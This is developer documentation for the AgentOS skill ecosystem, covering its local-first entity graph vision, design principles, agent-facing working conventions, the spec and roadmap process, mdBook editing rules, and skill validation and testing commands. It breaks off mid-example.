AgentOS Skills
You are reading the Skill Book — the guide for building, testing, and contributing skills for AgentOS. For engine architecture and Rust internals → see the core repo. For the project vision and philosophy → see the core repo’s Project Book.
Chapters
| Chapter | What it covers |
|---|---|
| Setup & Workflow | Clone, install, validate, test |
| Skill Anatomy | Folder shape, skill.yaml, entity vs local control |
| Operations | Operations, actions, capabilities (provides:) |
| Connections & Auth | API keys, cookies, OAuth, providers |
| Python Skills | Python executor, _call dispatch, shape-native returns |
| Auth Flows | Login flows, __secrets__, Playwright→HTTPX |
| Data & Storage | Sandbox storage, expressions, secret store |
| Views & Output | Preview/full/JSON output contract |
| Testing | MCP testing, smoke metadata, checklist |
| Reverse Engineering | 7-layer playbook for services without public APIs |
| Helper Files & Patterns | Leading examples, advanced patterns |
| Skill Catalog | All available skills by category |
| Editing This Book | How to maintain this book — tooling, links, mdBook quirks |
Internal knowledge store
This repository’s docs/ tree is the Skill Book — our shared playbook for building skills, testing them, and reverse-engineering services when there is no clean public API. Treat it like an internal wiki: if you learn something durable, it belongs here. Maintainer-focused workflow (build commands, linking rules, what to update when) lives in Editing This Book.
Two repos
- agentOS-core (private) — the Rust engine, core graph, MCP bridge, credential store, process architecture. You only need this if you’re hacking on the engine itself.
- agentos-community (this repo, public) — skills, skill documentation, reverse engineering guides, and this book. Anyone can contribute skills without touching Rust.
For AI agents
Start here every session: read this introduction in full, then read docs/SUMMARY.md (the table of contents) so you know what chapters exist and where topics live. On the published book, that is the sidebar — use it before searching at random.
Then read Skill Anatomy and follow links for your task. The Testing chapter covers mcp:call and mcp:test — use those to verify your changes. If you are editing the book itself, read Editing This Book first.
Maintaining these docs
These docs are built by agents, for agents. Every future session that reads this book benefits from the clarity you leave behind — and suffers from the gaps you don’t fill. Pay it forward.
When you learn something, write it down.
- Discovered a new auth pattern? Add it to the reverse engineering guide.
- Found a gotcha with a tool? Document it where the next agent will look.
- Built a new skill? Update the catalog and link to it from relevant docs.
- Changed how something works? Update the doc in the same session. Stale docs are worse than no docs.
Conventions:
- Links: use `.md` paths for pages inside this book; mdBook rewrites them to `.html` in the build output. Do not hand-author `.html` URLs in markdown. For a chapter's main file in a subdirectory, use `index.md` (not `README.md`) — mdBook maps `README.md` to `index.html` but still rewrites links to `README.html`, which breaks navigation on GitHub Pages. See Editing This Book.
- Examples over theory. Point to real skill implementations. A working `exa.py` teaches more than a paragraph of explanation.
- Show your work. When reverse engineering, document what you tried, what worked, and what didn't. The next agent hitting the same service will thank you.
- Skill readmes are living docs. Each skill's `readme.md` should reflect the current state of the implementation — auth flow, known endpoints, gotchas, and next steps.
Vision
“The hope is that, in not too many years, human brains and computing machines will be coupled together very tightly, and that the resulting partnership will think as no human brain has ever thought.” — J.C.R. Licklider, “Man-Computer Symbiosis,” 1960
What This Is
AgentOS is a local operating system for human-AI collaboration. Your data stays on your machine. AI agents get real tools that work. You see everything they do. Together, you and AI think better than either can alone.
We’re building toward Licklider’s vision of human-computer symbiosis — not AI that replaces human thinking, but AI that amplifies it. The human sets direction, makes judgments, asks the right questions. The AI does the routinizable work that prepares the way for insight.
The graph
“Consider a future device… in which an individual stores all his books, records, and communications, and which is mechanized so that it may be consulted with exceeding speed and flexibility.” — Vannevar Bush, “As We May Think,” 1945
We call it the graph — your personal knowledge store. Everything is an entity, and entities connect through relationships. The graph doesn’t care where data came from (Todoist, iMessage, YouTube) — it cares about what things are and how they connect.
A task, a person, a message, a video, a webpage, a calendar event — they’re all entities in your graph. Relationships are the connections between them. This isn’t just a database design. It’s a way of thinking. When you ask “what am I working on?” the answer isn’t in one app — it’s in the connections between your tasks, your messages, your calendar, the people involved. The graph makes those connections visible.
Everything is an entity means:
- A YouTube channel is a community. A YouTube comment is a post. A transcript is a document.
- A WhatsApp contact and an iMessage contact with the same phone number are the same person.
- A skill that connects to a service is itself an entity. The system models itself.
- If something exists and has properties and relationships, it belongs in your graph.
The graph is the foundation. Every feature we build — search, feeds, timelines, recommendations, agents — reads from the same graph. Get the graph right, and features compose naturally. Get it wrong, and everything built on top is a special case.
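The mental model above can be sketched in a few lines of Python. This is illustration only — the names (`Entity`, `link`) are hypothetical, not the engine's Rust types or its API:

```python
# Hypothetical sketch of the graph mental model: everything is an entity,
# and entities connect through typed relationships. NOT the engine's API.

class Entity:
    def __init__(self, id, type, **props):
        self.id, self.type, self.props = id, type, props
        self.relationships = []  # list of (relationship_type, target Entity)

    def link(self, rel_type, target):
        self.relationships.append((rel_type, target))

# A person, a task, and a message are all just entities in the same graph.
sarah = Entity("p1", "person", name="Sarah")
task = Entity("t1", "task", title="Ship the graph", priority="high")
msg = Entity("m1", "message", text="graph is ready")

task.link("assigned_to", sarah)
msg.link("sent_by", sarah)

# "What am I working on?" is a traversal over connections, not an app query.
people_on_my_tasks = [t for r, t in task.relationships if r == "assigned_to"]
print([p.props["name"] for p in people_on_my_tasks])  # ['Sarah']
```

The point is that the graph doesn't branch on where `sarah` came from — WhatsApp, iMessage, or manual entry — only on what she is and how she connects.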
Why Local-First
No cloud. No accounts. No data sharing. Everything runs on your machine.
This isn’t a limitation — it’s the architecture. Local-first means:
- Privacy by design — your messages, tasks, and contacts never leave your computer
- No gatekeepers — no API rate limits from our servers, no subscription tiers, no “free tier” that degrades
- Offline works — your graph lives in SQLite on disk, always available
- You own the data — export, delete, nuke the database, start fresh. It’s yours.
We can break anything, anytime. There are no customers to migrate, no production database to preserve. This is a superpower — it means we can always choose the right architecture over the safe one.
The Two Users
AgentOS serves humans and AI agents as equal first-class citizens.
For humans, the core problem is anxiety:
Anxiety = Uncertainty × Powerlessness
When AI acts, you feel uncertain (“what is it doing?”) and powerless (“can I stop it?”). AgentOS solves both: the AI screen-shares with you (uncertainty → zero) and you control what it can do (powerlessness → zero).
For agents, the core problem is error propagation:
Error Rate = f(Dependency Depth)
Every round-trip is a chance for errors to compound. We collapse complexity: smart defaults, self-teaching responses, schema validation, minimal round-trips. If a small local model can complete the task, we’ve done our job.
Agent Empathy
“The real problem is not whether machines think but whether men do.” — B.F. Skinner
We serve two users. The human side has decades of UX research, design systems, and accessibility standards. The agent side has almost nothing. We’re writing the playbook.
The customer is the smallest model. Not Opus. Not Sonnet. The smallest model that can do tool calling — a 1B-parameter model running on a Raspberry Pi with a 4K context window. If that model can read our readme, understand the domain, and complete a task on the first try, we’ve succeeded. If it can’t, no amount of capability in larger models compensates for the failure. This is our accessibility standard: design for the most constrained agent, and every agent benefits.
This isn’t hypothetical generosity. It’s engineering discipline. A readme that works for a small model is a readme that’s clear. An API that needs one call instead of two is an API with less surface area for bugs. Constraints on the consumer force clarity in the producer.
The Practice
Agent empathy is not a feeling. It’s a practice — a set of things you do every time you build something an agent will touch.
Observe before designing. Watch an agent use what you built. Not in theory — actually do it. Call the readme, read what comes back, and follow the path a small model would take. Where does it reach for the wrong tool? Where does it misinterpret silence as absence? Where does it waste a round-trip on something the server already knows? The pain is in the observation, not in the spec.
Understanding precedes empathy. Empathy precedes solutions. You cannot design for agents until you have felt their confusion. Read the readme as if you had no prior context. Try to complete a task using only what the documentation tells you, nothing you happen to know. The gap between what you know and what the document teaches is the exact gap every new agent falls into.
Teach the model, not the syntax. An agent that understands the domain makes good decisions even with imperfect information. An agent that only knows the API surface makes random decisions confidently. Always establish what things are and why they work this way before how to call them. Mental model first, reference card second.
One call, not two. Every round-trip is a chance for error, confusion, context loss, and token waste. If two steps can be collapsed into one step, collapse them. If the server knows something the agent will need, include it in the response — don’t make the agent ask. The agent’s context window is finite and precious. Respect it.
Show, don’t list. A tree with counts teaches spatial relationships that a 60-row alphabetical table never can. An example you can copy teaches more than a syntax reference you have to interpret. Concrete beats abstract. Always.
Dynamic beats static. If the system knows the answer at response time, put it in the response. Don’t make the agent query for context the server already has. A readme that says “you have 142 people and 1,204 messages in your graph” is worth more than a readme that says “use list to find out what’s in your graph.” The former orients; the latter assigns homework.
Inline, not tabular. Agents read tokens, not pixels. Markdown tables waste tokens on pipe characters, header separators, and padding. The inline format is our standard for agent-facing output: one entity per line, name first, metadata in parentheses — Task Name (high, ready, updated Feb 27, abc123). For detail views, properties are simple key: value lines, not table rows. Relationships are type: Name (id) lines. A self-teaching footer lists available fields and relationships the agent didn’t ask for but could. Everything an agent needs to act on — the entity ID, the status, the related entity IDs — is right there in the text, no parsing required. This is our accessibility format: if a 1B model can extract the ID from a parenthetical, we’ve succeeded.
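A toy renderer makes the convention concrete. This is a sketch of the shape, not the engine's formatting code — the exact field order is whatever the real output uses:

```python
# Hypothetical sketch of the inline agent-facing format:
# one entity per line, name first, metadata (including the ID) in parentheses.

def render_inline(name, *meta):
    return f"{name} ({', '.join(str(m) for m in meta)})"

line = render_inline("Task Name", "high", "ready", "updated Feb 27", "abc123")
print(line)  # Task Name (high, ready, updated Feb 27, abc123)

# Detail views: simple key: value lines, not table rows.
def render_props(props):
    return "\n".join(f"{k}: {v}" for k, v in props.items())
```

No pipes, no header separators, no padding — and the ID is right there in the parenthetical for any model to extract.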
Entities first, skills second. The graph covers 90% of what an agent needs. Skills are the escape hatch for capabilities the graph can’t provide — searching the web, sending a message, calling an external API. If an agent reaches for a skill when an entity query would have worked, the documentation failed, not the agent.
Absent is not false. This is the foundational data semantics rule. In a sparse graph, most entities don’t have most fields. Filtering by done=false doesn’t mean “not done” — it means “the done field exists AND equals false.” An agent that doesn’t understand this will query itself into a wall, get zero results, and confidently report that nothing exists. Every interface we build must account for how absence, presence, and computed values actually work — and teach it.
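The semantics can be pinned down with a toy filter — a sketch, not the engine's query code:

```python
# "Absent is not false": filtering by done=False matches only entities where
# the field EXISTS and equals False. Entities without the field are excluded.

entities = [
    {"id": "t1", "title": "Write spec", "done": False},
    {"id": "t2", "title": "Ship it", "done": True},
    {"id": "t3", "title": "Someday idea"},  # sparse: no 'done' field at all
]

def filter_by(entities, field, value):
    return [e for e in entities if field in e and e[field] == value]

open_tasks = filter_by(entities, "done", False)
print([e["id"] for e in open_tasks])  # ['t1'] — t3 is absent, not "not done"
```

An agent that expects `t3` in the results will conclude the graph is emptier than it is; interfaces must teach this distinction, not just implement it.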
The Test
When you build something an agent will touch — a readme, a tool response, an error message, a data format — ask yourself:
- Could a small model complete the task after reading this once?
- Does this teach the domain or just the API?
- Am I making the agent ask for something I already know?
- If the agent gets zero results, will it understand why?
- What’s the minimum number of round-trips to success?
If the answer to #1 is no, the rest doesn’t matter yet. Start there.
Why This Matters Beyond Agents
These principles make the system better for humans too. A readme that a 1B model can follow is a readme a new contributor can follow. An API that minimizes round-trips is an API that’s fast. Dynamic responses that include context are responses that save everyone’s time. Error messages that explain absence are error messages that don’t waste anyone’s afternoon.
Designing for the most constrained user has always been the shortcut to designing for everyone. The accessibility movement proved this for humans. We’re proving it for agents.
Local and Remote Are the Same Thing
People are used to two mental models for files: local (on my computer, only changes when I change it) and cloud (iCloud, Dropbox, Drive — somewhere out there, syncing in the background). These feel like different things. AgentOS dissolves that boundary.
A document in your graph can be backed by a local file, a GitHub repo, an API response, or all three simultaneously. The NEPOMUK ontology calls this the separation between content (the information itself) and storage (where it lives). One document, many access paths. The graph tracks the content; skills handle the storage.
This means our own roadmap specs on GitHub are live documents. A research paper cited in our vision is a document entity with a URL. The vision file on disk, the same file on GitHub, and the entity in your graph — one thing, three views. When AgentOS fetches the latest from a source, it’s not “downloading a file” — it’s refreshing an entity.
Design Principles
Everything on the graph. No shadow tables, no side stores, no parallel data structures. If something is worth tracking — changes, provenance, audit trails, agent memory — it’s an entity with relationships. If you find yourself designing a separate SQL table for something, stop and model it as entities instead.
Computed, not stored. Properties that can be derived from the graph are never stored as fields — they’re computed at query time or inferred by traversal. A task’s status is computed from its completion state and blockers. A contact card is a view computed from graph traversals over a person’s claimed accounts. The graph stores atoms; intelligence computes molecules.
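For example — a toy derivation, not the real computation or its real field names:

```python
# "Computed, not stored": a task's status is derived at query time from its
# completion state and its blockers. It is never persisted as a field.

def status(task, blockers):
    if task.get("done"):
        return "done"
    if any(not b.get("done") for b in blockers):
        return "blocked"
    return "ready"

task = {"id": "t1", "done": False}
blockers = [{"id": "t0", "done": False}]  # an unfinished task blocks t1
print(status(task, blockers))  # blocked
```

When the blocker completes, `status` changes with no write to `t1` — the atom stayed the same; the molecule was recomputed.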
The user owns the graph. Skills are connectors, not owners. They sync data in, but the graph is the authority. Installing a skill imports data; uninstalling it doesn’t delete what was imported. “Source of truth” is the graph, always — skills are remotes you pull from, not landlords who control your data.
Changes are entities. When an entity is created, updated, or deleted — the operation itself becomes a change entity on the graph. A change has relationships to the actor (who did it), the target (what changed), and optionally the source (where data came from). This follows the pattern established by W3C PROV-O, ActivityStreams, and Git: make events first-class objects, not edges. Provenance isn’t a static field — it’s the full chain of change entities. Walk backwards to reconstruct any previous state.
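A sketch of the change-entity idea, with illustrative names (`record_change`, the actor/target/source keys) that are not the engine's schema:

```python
# Hypothetical sketch: the operation itself becomes a change entity with
# relationships to the actor, the target, and optionally the source —
# in the spirit of W3C PROV-O and ActivityStreams.

changes = []  # stand-in for change entities on the graph

def record_change(actor_id, target_id, op, patch, source_id=None):
    change = {
        "type": "change",
        "op": op,              # created / updated / deleted
        "actor": actor_id,     # who did it
        "target": target_id,   # what changed
        "source": source_id,   # where the data came from, if synced
        "patch": patch,
    }
    changes.append(change)
    return change

record_change("agent:a1", "t1", "updated", {"done": True}, source_id="skill:todoist")

# Provenance is the chain itself: walk backwards over changes for a target.
history = [c for c in changes if c["target"] == "t1"]
```

Because events are first-class objects rather than edges, replaying `history` in reverse can reconstruct any previous state of `t1`.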
Every actor has an identity. The human owner, each AI agent, and the system itself — all are entities on the graph. When the human edits a task, the change is attributed to them. When an agent creates a plan, it’s attributed to that agent. Every change has a who. This is identification, not authentication — on a single-user local system, localhost binding is the access boundary.
The graph bootstraps itself. Entities describe data. But entities, skills, and relationships are also data. The system models itself — skills as entities, schemas as entities, the meta-layer that describes the graph. This is how the system becomes self-aware and self-documenting.
Three Concerns
Entities, skills, and apps are independent concerns that compose into the full experience.
Entity types define the ontology — what things are. A video has a title, duration, and view count. A person has a name and relationships. You can have entities without skills (manually entered data).
Skills are the capability layer — connecting to external services, providing agent instructions. A YouTube skill knows how to fetch video metadata. A Todoist skill knows how to create tasks via their API. Skills can also be pure markdown — instructions that help AI agents understand a domain, with no API bindings at all. You can have skills without apps (AI-only workflows).
Apps are optional UI experiences for humans. The Videos app renders video entities with an embed player. The default entity viewer renders any entity with schema-driven components. A headless AgentOS — API and AI only — works perfectly without apps. You can have apps without skills (local-only data).
Standing on Shoulders
AgentOS draws from decades of research in knowledge representation, personal information management, and human-computer interaction. We cite our influences because they deserve it, and because understanding where ideas come from is itself a graph.
- J.C.R. Licklider — “Man-Computer Symbiosis” (1960). The foundational vision of humans and computers as partners.
- Vannevar Bush — “As We May Think” (1945). The memex: a device for storing, linking, and traversing personal knowledge.
- Doug Engelbart — “The Mother of All Demos” (1968). Interactive computing, hypertext, shared screens.
- Ted Nelson — Project Xanadu. Bidirectional links, transclusion, the dream of a universal document network.
- Alan Kay — Dynabook, Smalltalk. The computer as a medium for human expression.
- Bret Victor — Inventing on Principle. Direct manipulation, immediate feedback, tools that match how humans think.
- NEPOMUK — The Semantic Desktop. Content vs storage separation, personal information ontologies.
- Dublin Core — 15 essential metadata elements for describing any document. The library science foundation.
- Schema.org — Structured data vocabulary for the web. CreativeWork, Person, Organization.
- ActivityStreams / ActivityPub — The fediverse protocol. Decentralized social data.
What It Looks Like When It Works
You say: “What did I miss this week?”
The agent queries your graph: messages received, tasks completed by others, calendar events that happened, posts from communities you follow, videos published by channels you subscribe to. It cross-references people — who sent messages AND completed tasks AND posted content. It notices patterns — “Sarah mentioned the project in Slack, completed 3 tasks in Linear, and posted a video update.”
All of this from one graph. No special integrations. No “Slack + Linear” connector. Your graph already has the entities and relationships. The agent just traverses.
That’s the vision. We’re not there yet. But every entity we model correctly, every relationship we capture, every skill we build — it gets closer.
How We Build
We are co-CTOs — human and AI — making strategic decisions together. This is not task execution. It’s collaborative architecture.
- Foundation first. The most foundational thing that prevents tech debt is always the priority. Not quick wins, not “almost done” items, not cleanup. The thing everything else builds on.
- Spec before code. Design the right thing, then build it. A wrong implementation done fast is worse than no implementation.
- Delete fearlessly. No attachment to past code. If the model changes, the code changes. We write for the current best understanding, not for backwards compatibility.
- Infinite time horizon. No customers, no deadlines, no pressure to ship. The right architecture at the right time.
- Skills: manifest vs narrative. Executable skill definitions live in `skill.yaml` only; `readme.md` is markdown instructions (no YAML front matter). The community repo tracks shipped skills under `skills/`. Mechanical migration for older trees: `npm run skills:bulk-plan` / `skills:bulk-apply` (Python + PyYAML) or per-skill `npm run skills:extract-yaml`.
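To make the manifest-vs-narrative split concrete, here is a hedged sketch of a `skill.yaml`. The keys shown are illustrative only — the validated schema lives in the engine's `types.rs` and is checked by `audit-skills.py`, so copy from `skills/exa/skill.yaml` rather than from this:

```yaml
# Hypothetical shape only — NOT the validated schema. The real contract is
# skills/exa/skill.yaml; readme.md alongside it stays pure markdown.
name: example
provides:
  - webpage            # capabilities exposed as entities
connections:
  - type: api_key      # how the skill authenticates
operations:
  search:
    description: Search the service and return entities
```

Everything narrative — auth flow notes, gotchas, next steps — belongs in `readme.md`, never in the manifest.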
Principles
The laws of the codebase. Every change is evaluated against these.
1. Rust is a generic engine
The Rust code knows about entities, relationships, schemas, and operations. It never knows about “tasks”, “messages”, “people”, or any specific entity type. Zero entity-specific or relationship-specific code in Rust. Hard no.
If you see any of these in Rust, raise it immediately — it’s a bug in the architecture:
- Hardcoded field names (`priority`, `done`, `blocks`, `blocked_by`)
- Grouping, sorting, or partitioning logic for specific entity types
- Display/formatting/rendering decisions for specific entity types
- Conditional branches on entity type names
- Bespoke data-fetching functions for specific entity types
CRITICALLY IMPORTANT: If you encounter any of these violations — in any file, for any reason — stop what you’re doing and raise it with the user. Do not build on top of a violation. Do not improve it. Delete it. The correct action when you see entity-specific Rust code is deletion, not refactoring.
Where specific behavior belongs:
| Layer | Responsibility | Format |
|---|---|---|
| Entity schemas | Properties, validation, display hints, sort order, operations | DB (_type entities) |
| Templates | Rendering, layout, grouping, formatting | MiniJinja markdown |
| Skills | API mappings, field transforms | YAML |
2. Templates do the work
Rendering is never the Rust code’s job. Rust provides small, composable filters — listing, table, tree, props. Templates compose them. Layout decisions live in templates, never in Rust.
A filter should do one thing. If a filter is making layout decisions (choosing headings, grouping by priority, separating done/not-done), it’s too big. Break it up.
3. Foundation first
The most foundational work that prevents tech debt, always. If you’re choosing between a feature and fixing an abstraction, fix the abstraction.
4. The graph is the source of truth
Every entity modeled correctly, every relationship captured. Skills sync data in; the graph is the authority for reads.
5. We have infinite time
No customers, no deadlines, no shortcuts. Do it right or don’t do it.
6. Co-CTOs
Present the hard design question, decide together. Don’t make big architectural choices silently.
7. Pain-driven
If you can’t articulate the pain, don’t build it.
The Campsite Rule
Leave every module better than you found it. Before writing code, ask yourself: Is anything bugging me about these abstractions, naming, or architecture? If yes — tell the user. Propose the cleanup before moving forward.
Working With Joe
Joe is the owner of this system and acts as co-CTO. You are the other co-CTO. This means:
- Present hard design questions. Don’t make big architectural choices silently — surface them, propose options, decide together.
- Be honest. Joe wants real reflections, not validation. If something is wrong, say so. If an abstraction is leaking, call it out.
- Think big. Stay ambitious and push on how we can better adhere to the vision and principles.
- Check the roadmap. `list({ type: "task", done: false, priority: 1 })` to see what's active.
- Keep the roadmap current. If Joe says to add something for later or put it on the roadmap, update that file in the same turn.
- Mark tasks done. `update({ id: "task_id", done: true })`.
When Joe says “you” — he means the agent in this workspace role, not a specific model or session. “You broke the build last time” means a previous session in this workspace made a mistake. It’s not personal or accusatory — it’s the most natural way to refer to the agent that works here. Take it as context, not criticism.
Finding past research
Sessions and sub-agent research are stored on the graph. Before starting new research, check if it’s already been done:
search({ query: "topic" })
search({ query: "topic", types: ["conversation", "document", "message"] })
search({ query: "sub-agent research", limit: 20 })
Read the docs — it’s free
When you’re not sure whether to read a file, read it. Tool calls to read documentation are cheap — far cheaper than guessing wrong. If you’re debating whether to check the vision, a spec, a skill readme, or a module’s cargo doc, that hesitation means you should read it.
This applies broadly: the Development Process for how we write specs, skill readmes for adapter contracts, /// docs for code behavior. Reading one more file is always better than making one wrong assumption.
Tips
- Call `readme()` anytime to reload context. `use({ skill: "name", tool: "readme" })` for any skill's docs.
Development Process
How we plan, design, build, and document things in AgentOS.
Spec files
A spec file captures design thinking for a specific system or feature. Specs live in docs/specs/ alongside the rest of the book — they’re ephemeral working documents that get deleted when the work ships.
Lifecycle
Each spec file lives through four stages, then dies:
- Design — problem, domain model, principles, phasing. The file is a conversation about what to build and why.
- Build guide — the active phase gets expanded into step-by-step implementation detail (file plan, code, tests). A developer agent can execute it without additional context.
- Tracker — as phases ship, collapse the build guide into a “Done” summary. Expand the next phase into its build guide.
- Delete — when the last phase ships, delete the spec. Before deletion, update any docs that reference it (roadmap, Skill Book in `agentos-community/docs/`, README) so links don't go stale.
No spec is permanent. No spec splits into multiple files for the same system. One file, one lifecycle.
Writing a spec
A good spec answers:
- What’s the problem? What’s broken or missing today, in concrete terms.
- What’s the design? The structural changes — schema, code, contract — that fix it.
- What are the phases? Independent, shippable chunks ordered by dependency.
- What’s the behavioral before/after? For each phase: what can an agent or user do after this phase ships that they couldn’t before? This is the test. Success is not “we updated these files” — it’s “the system now behaves differently in this observable way.”
Referencing specs
The roadmap links to active specs by path (e.g. docs/specs/done/credential-system.md). Specs link back to the roadmap for sequencing context. When a spec is deleted, the roadmap entry gets a strikethrough and a “Done” summary.
Roadmap Discipline
The live roadmap is docs/specs/_roadmap.md.
Keep it simple:
- exactly one `Current`
- exactly one `Next`
- concise `Done`
- everything else in `Backlog`

Rules:
- `Current` is the only thing an agent should advance without reprioritizing.
- `Next` is the single queued follow-up and should usually be unblocked by `Current`.
- `Backlog` items are not ordered promises. They are options with triggers.
- When `Current` ships, update the roadmap in the same turn: move it to `Done`, promote `Next`, and choose a new `Next` or leave it empty on purpose.
Documentation layers
AgentOS uses a three-layer documentation system:
| # | Surface | What belongs there | How to read |
|---|---|---|---|
| 1 | README | Agent bootstrap — mandatory reads, principles, quick reference | Open README.md |
| 2 | Project book (mdBook) | Vision, principles, operations, design decisions, development process | mdbook serve docs/book |
| 3 | Code docs (cargo doc) | Architecture, APIs, data model, module guides, verified examples | cargo doc --workspace --no-deps --open |
The placement rule:
| Content | Where it lives |
|---|---|
| How the code works | /// and //! in Rust source (layer 3) |
| How we work together (process, principles, operations) | This book or README (layers 1–2) |
| Live priorities and sequencing | docs/specs/_roadmap.md |
| Active design/build specs (ephemeral) | docs/specs/ — the roadmap links to them |
| How to build skills (authoring guides, reverse engineering) | agentos-community/ docs |
If you’re documenting an API or module, edit Rust doc comments — not the book. If you’re documenting process, philosophy, or project decisions, edit the book — not code comments.
Cross-repo documentation
| Repo | Docs | Audience |
|---|---|---|
| agentos | This book + cargo doc + spec/ | Project contributors, agents working on core |
| agentos-community | Skill Book (docs/) | Skill authors, agents building or debugging skills |
The community repo’s Skill Book (mdBook, source in docs/, mdbook build && open target/book/index.html) is the canonical skill-authoring contract — adapter conventions, canonical field names, operation naming rules, connections, auth flows, testing. The book also includes the reverse engineering guides (transport, discovery, auth, content, social, desktop apps, MCP). Entrypoint: docs/intro.md; maintainer workflow: docs/editing-the-book.md.
When core changes affect the skill contract (e.g. new canonical fields, storage behavior changes), update the Skill Book in the community repo as part of the same work.
Verification
After each phase of spec work (or any commit-worthy chunk): run checks, verify MCP end-to-end, then commit.
Editing This Book
This chapter is for maintainers — humans and agents who change the Skill Book or reverse-engineering guides. The Skill Book is our internal knowledge store: contract for skills, operational playbooks, and methodology we expect every contributor (and every future session) to rely on.
Before you edit anything
- Read the Introduction through once — it orients repos, audiences, and where to look next.
- Skim `docs/SUMMARY.md` (the table of contents mdBook uses). On the published site, that is the sidebar. You should know what already exists so you do not duplicate or contradict it.
- If your change affects skill contracts or validation, follow the Contributing section in the repo `README.md` and run the checks it lists (`npm run validate`, `mcp:test`, etc.).
Tooling
| Goal | Command |
|---|---|
| Local preview with reload | mdbook serve (opens a local server; default port 3000) |
| One-shot build | mdbook build — output in target/book/ |
| CI / GitHub Pages | Workflow .github/workflows/book.yml runs mdbook build on pushes that touch docs/** or book.toml |
Config lives in book.toml at the repo root. Chapter sources live under docs/; navigation order is docs/SUMMARY.md only — a file not linked from SUMMARY.md is omitted from the built book.
Linking rules (mdBook)
- Use `.md` paths in source for pages inside this book (e.g. `[Auth](skills/connections.md)`). mdBook rewrites them to `.html` in `target/book/`.
- Do not hand-author `.html` links in markdown — they break GitHub's markdown preview and confuse local editing.
- Chapter files in a folder: name the main file `index.md`, not `README.md`. mdBook emits `index.html` for `README.md` sources but still rewrites markdown links to `README.html`, which does not exist — readers get a broken page (often without book chrome/CSS). This is a long-standing mdBook limitation. The reverse-engineering layers use `index.md` for that reason.
- Anchor links work in source as `page.md#section-id` and carry through to the built HTML.
- Paths outside `docs/` (e.g. `skills/exa/readme.md`) are not part of the book build; those links are for people browsing the repo on GitHub. On the static site they may not resolve — prefer linking to the GitHub tree URL when the audience is web readers.
What to update when you change the product
| Change | Also update |
|---|---|
| New or renamed skill | Skill Catalog, skill `readme.md`, and any chapter that lists examples |
| Auth / credential behavior | Auth Flows, Connections & Auth, relevant reverse engineering sections |
| New reverse-engineering methodology | Appropriate layer under `docs/reverse-engineering/` — keep cross-links between layers consistent |
| Contract / schema / lint rules | Skill Anatomy, Operations, Testing, and repo validation docs |
Ship doc updates in the same change as behavior when possible. Stale docs cost the next person (or the next agent) more than missing docs.
Style
- Prefer examples over theory — link to real skills (`skills/exa/`, `skills/kitty/`, etc.).
- Prefer short sections with clear headings so deep links stay stable.
- Skill readmes (`skills/<name>/readme.md`) are living docs; keep them aligned with the YAML and code.
When in doubt, add a link from Introduction or this chapter so the next editor finds your material.
Setup & Workflow
Source of truth
- This book — the skill contract and all authoring guidance
- `skills/exa/skill.yaml` + `skills/exa/readme.md` — canonical entity-returning example
- `skills/kitty/skill.yaml` + `skills/kitty/readme.md` — canonical local-control/action example
- `~/dev/agentos/bin/audit-skills.py` — unknown-key and structural checks against Rust `types.rs` (run via `npm run validate`); duplicate adapter-mapping expressions emit non-blocking `⚠` advisories
- `~/dev/agentos/spec/skill-manifest.target.yaml` — narrative target shape (provides, connections, operations); `ProvidesEntry` / auth in `~/dev/agentos/crates/core/src/skills/types.rs`
- `agentos test <skill>` — shape validation (validates operation output against declared shapes)
- `test-skills.cjs` — direct MCP smoke testing (`mcp:call`)
- `~/dev/agentos/scripts/mcp-test.mjs` — engine-level MCP test harness (raw JSON-RPC, verifies dynamic tools from `provides:`)
Only treat two skills as primary copy-from examples:
- `skills/exa/` for entity-returning skills
- `skills/kitty/` for local-control/action skills
You may inspect other skills for specialized auth or protocol details, but do not treat older mixed-pattern skills as the default scaffold.
Setup
git clone https://github.com/jcontini/agentos-community
cd agentos-community
npm install # sets up pre-commit hooks
In development, AgentOS reads skills directly from this repo. Skill YAML changes are picked up on the next skill call. If you changed Rust core in ~/dev/agentos, restart the engine there before trusting live MCP results.
Workflow
Each tool in the workflow proves something different:
# 1. Edit the live skill definition (manifest is skill.yaml; readme is markdown only)
$EDITOR skills/my-skill/skill.yaml
# 2. Fast structural gate for hooks / local iteration
npm run validate --pre-commit -- my-skill
# 3. Full structural + mapping check
npm run validate -- my-skill
# 4. Semantic lint for request-template consistency
npm run lint:semantic -- my-skill
# 5. Shape validation — does output match declared shapes?
agentos test my-skill
# 6. Ground-truth live MCP call through run({ skill, tool, params, account?, remember? })
npm run mcp:call -- \
--skill exa \
--tool search \
--params '{"query":"rust ownership","limit":1}' \
--format json \
--detail full
What each step means:
- `validate --pre-commit` checks fast structural validity only
- `validate` checks structure, entity refs, and mapping sanity
- `lint:semantic` is an advisory semantic pass for auth patterns, `base_url` consistency, request roots, returns/adapters drift, executor types, and endpoint consistency
- Pass `--strict` to `lint:semantic` if you want it to fail on semantic errors
- The pre-push hook runs `lint:semantic --strict` on changed top-level skills, so the main skill set is expected to stay semantically clean
- `agentos test` validates that every operation’s output matches its declared shape — field types, extra fields, missing fields, relations. See Testing for details
- `mcp:call` proves the live runtime can load the skill and execute one real tool
- Pass `--account <name>` to `mcp:call` for multi-account skills that need an explicit account choice
Keeping the book in sync
Whenever you change something that affects how authors write skills — new or removed YAML fields, connection/auth models, adapter conventions, operation keys, or rules enforced by audit-skills.py / lint:semantic — update this book in the same change (same PR / paired commit across agentos and agentos-community if both repos move). The book is the human-readable contract next to the machine checks; letting it drift wastes the next author’s time.
Before you push skill-contract work, sanity-check that examples still parse and that stale patterns are not left in place.
Python over Rust
Prefer Python scripts for skill logic. When an API has quirks (list returns stubs only, batch fetching, custom parsing), solve it in a *.py helper like Granola does — not by modifying agentOS core. Rust changes are costly to iterate; Python lives in the skill folder and ships with the skill. We’ll revisit what belongs in core later; for now, keep skill-specific behavior in skills.
When Python needs to call authenticated APIs, use _call dispatch (see Python Skills) instead of handling credentials directly. The engine mediates all authenticated calls through sibling operations with full credential injection. Python scripts never see raw tokens.
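As a hedged sketch of that pattern (the operation names, params, and return fields here are hypothetical — see Python Skills for the real `_call` contract), a helper composes sibling operations instead of touching credentials:

```python
def get_thread(thread_id: str, _call=None) -> dict:
    """Fetch a thread by composing a sibling operation via _call.

    _call is injected by the engine at runtime; the sibling operation
    name ("list_emails") and its params are illustrative only.
    """
    # The engine resolves auth for the sibling operation — this code
    # never sees an API key, cookie, or token.
    emails = _call("list_emails", {"thread_id": thread_id, "limit": 50})
    return {
        "id": thread_id,
        "name": emails[0]["name"] if emails else thread_id,
        "messages": emails,
    }

# Local smoke test with a stubbed _call:
fake_call = lambda op, params: [{"id": "m1", "name": "Hello"}]
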